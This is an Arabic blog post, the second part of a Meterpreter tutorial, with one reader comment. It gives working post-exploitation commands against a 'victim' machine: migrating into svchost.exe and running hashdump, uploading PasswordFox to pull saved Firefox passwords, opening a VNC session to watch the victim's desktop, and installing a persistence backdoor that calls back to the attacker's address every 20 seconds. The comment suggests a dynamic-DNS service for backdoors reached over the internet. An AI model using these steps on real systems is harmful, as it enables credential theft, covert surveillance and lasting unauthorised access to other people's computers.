قوة الميتربرتر – الجزئ الثاني

 السلام عليكم اليوم سأتابع ما بدأته عن قوة الميتربرتر في الجزئ الاول تعرفنا على الميتيربرتر و بعض مزاياه, في هذا الجزئ سنرى كيفية استخراج هاشات كلمات السر المحملة في ذاكرة النظام Password Hashes , و كذلك سنرى طريقة خفيفة لاستخراج كلمات السر المسجلة في المتصفحات Browsers , و ايضا كيفية عمل اتصال VNC, و في الاخير سنقوم بتركيب Backdoor في النظام عن طريق خاصية persistence لتأمين الاتصال مع النظام و الحصول على جلسة ميتربرتر حتى بعد اعادة تشغيله .

استخراج الهاشات (Password Hashes)

  في نهاية الجزئ الاول قلت بان قوة الميتربرتر تتمثل في السكربتات التي يمكن استخدامها معه للقيام باعمال معينة من هذه السكربتات  اولا وقبل كل شيئ علينا ترحيل الميتربرتر الى خدمة service تعمل بصلاحيات النظام ساقوم بترحيله الى خدمة svchost.exe والتي تحمل المعرف 724 بعد ذلك نطبق الامر :

hashdump

كما ترون في الصورة حصلنا على الهاشات الآن يمكن نسخ الهاش و لصقه في جوجل لنرى هل سبق و ان فك تشفيره , او نقوم نحن بفك تشفيره باحدى الطرق المعروفة

استخراج كلمات السر المخزنة في firefox

من المعروف ان المتصفحات Browsers تمتلك ميزة تخزين كلمات السر و لهذا الكثير من المستخدمين منهم انا , يستعينون بهذه الميزة و خاصة ان كانت كلمات السر المستخدمة معقدة و كثيرة , هذه الميزة تشكل ضعف امني لانه اي شخص متواجد فيزيائيا على الجهاز يمكنه الحصول على هذه الباسووردات  لكن في حالتنا هذه نمتلك جلسة ميتربرتر  بمعنى Remote connection  ولهذا سنستخدم ميزة اخرى للميتربرتر و هي تحميل الملفات من و الى جهازنا حيث سنرفع اداة PasswordFox الصغيرة لتستخرج لنا الباسبووردات في ملف نصي بعد ذلك نقوم بتحميله الى جهازنا و نتمتع بالحسابات المسجلة , اولا علينا رفع الاداة عن طريق الامر:

upload PasswordFox.exe  

بعد رفع الاداة نطبق shell الامر للحصول على command shell على النظام يمكننا من استخدام الاداة و استخراج الباسووردات في ملف نسميه pass على سبيل المثال :

الآن انتهينا و لكن لم نحصل على الملف و لهذا يتوجب علينا نقله الى الجهاز المحلي عن طريق الأمر :

download pass

بعد ذلك يمكن قرائته عن طريق الامر cat :

بالنسبة للمتصفحات الاخرى يمكن استخدام نفس الفكرة و لكن بادوات اخرى بكل تأكيد .

الحصول على اتصال VNC

VNC او Virtual Network Computing عبارة عن مشاركة لسطح المكتب عن طريق الشبكات فمثلا اي جهاز يحتوي على خدمة VNC يمكننا الاتصال به و التحكم بسطح مكتبه عن طريق جهازنا و لعمل اتصال VNC عن طريق الميتربرتر يجب تشغيل السكربت vnc عبر الامر التالي :

run vnc

بعدها ننتظر قليلا لتظهر لنا نافذة التحكم بسطح المكتب و كما ترون يبدو ان الضحية يستخدم برنامج paint :

استخدام scraper لجمع معلومات النظام 

scraper.rb عبارة عن سكربت رائع لجمع المعلومات من النظام و تسجيلها في log file و لاستخدامه نطبق الامر التالي :

run scraper 

مع التنويه انه يتم التخزين في مجلد logs للميتاسبلويت

تركيب backdoor

تخيل معي ان نجحت في استغلال ثغرة في نظام معين و حصلت على جلسة ميتيربرتر او كوماند شل بعد ذلك انقطع الاتصال بالنظام , ستعود مجددا لاستغلال الثغرة , في حالة ما تم ترقيع  ,  الثغرة لن تنجح في اختراق النظام لتعود الى الوراء والبحث عن ثغرة اخرى او طريقة اخرى تركيب باكدور على النظام سيساعدنا في تخطي هذه المشكلة لنضمن الاتصال بالنظام حتى و تمت اعادة تشغيله سنستخدم سكربت persitence لحقن عميل ميتربرتر في النظام و اعداده ليحاول الاتصال بجهازنا كل 20 ثانية عن طريق الامر التالي :

run persistence -X 20 -p 5555 -r 192.168.56.101

الخيار X لاختيار الوقت , الخيار p لتحديد البورت و r لتحديد عنوان آيبي جهازنا :

الآن يمكنك التخلص من جلسة الميتربرتر هذه و التنصت على البورت 5555 لانه في جهاز الضحية الآن يوجد عميل يحاول الاتصال بك كل 20 ثانية لفتح جلسة ميتربرتر جديدة , سأقوم الآن بالتنصت على البورت 5555 عن طريق multi handler في الميتاسبلويت :

ننتظر قليلا ليأتينا الاتصال اذا كان نظام الضحية up

الى هنا ينتهي الدرس .

تعليق واحد

Filed under Uncategorized

One response to “قوة الميتربرتر – الجزئ الثاني

  1. شرح جميل ولكن عندي ملاحظة بسيطة بعد عمل الباكدور وضعت ip الداخلي وهو لن يتغير ولكن ماذا في الحالة التي وضعنا ال-ip الخارجي ، أظن هنا سيكون من المفيد إستخدام برنمج إختراق وتثبيته بال n0-ip

اترك رد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

شعار ووردبريس.كوم

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   /  تغيير )

Google photo

أنت تعلق بإستخدام حساب Google. تسجيل خروج   /  تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   /  تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   /  تغيير )

Connecting to %s